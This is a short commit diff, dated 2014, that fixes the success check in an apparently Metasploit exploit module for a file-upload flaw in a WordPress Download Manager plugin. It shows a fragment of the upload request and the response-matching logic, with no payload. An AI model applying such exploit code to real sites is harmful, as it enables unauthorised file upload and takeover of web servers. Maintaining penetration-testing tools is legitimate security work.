fix bug

firefart · firefart · commit 5ea062bb9c6b · 2014-12-05T11:30:45.000+01:00
diff --git a/modules/exploits/unix/webapp/wp_downloadmanager_upload.rb b/modules/exploits/unix/webapp/wp_downloadmanager_upload.rb
@@ -59,7 +59,7 @@ def exploit
         'vars_get' => { 'task' => 'wpdm_upload_files' }
       )
 
-      if res && res.code == 200 && res.body && res.body.length > 0 && res.body !~ /filename.+\.php$/
+      if res && res.code == 200 && res.body && res.body.length > 0 && res.body =~ /#{Regexp.escape(filename)}$/
         uploaded_filename = res.body
         register_files_for_cleanup(uploaded_filename)
         print_status("#{peer} - File #{uploaded_filename} successfully uploaded")

Original file line number	Diff line number	Diff line change
`@@ -59,7 +59,7 @@ def exploit`
`59`	`59`	`'vars_get' => { 'task' => 'wpdm_upload_files' }`
`60`	`60`	`)`
`61`	`61`
`62`		`- if res && res.code == 200 && res.body && res.body.length > 0 && res.body !~ /filename.+\.php$/`
	`62`	`+ if res && res.code == 200 && res.body && res.body.length > 0 && res.body =~ /#{Regexp.escape(filename)}$/`
`63`	`63`	`uploaded_filename = res.body`
`64`	`64`	`register_files_for_cleanup(uploaded_filename)`
`65`	`65`	`print_status("#{peer} - File #{uploaded_filename} successfully uploaded")`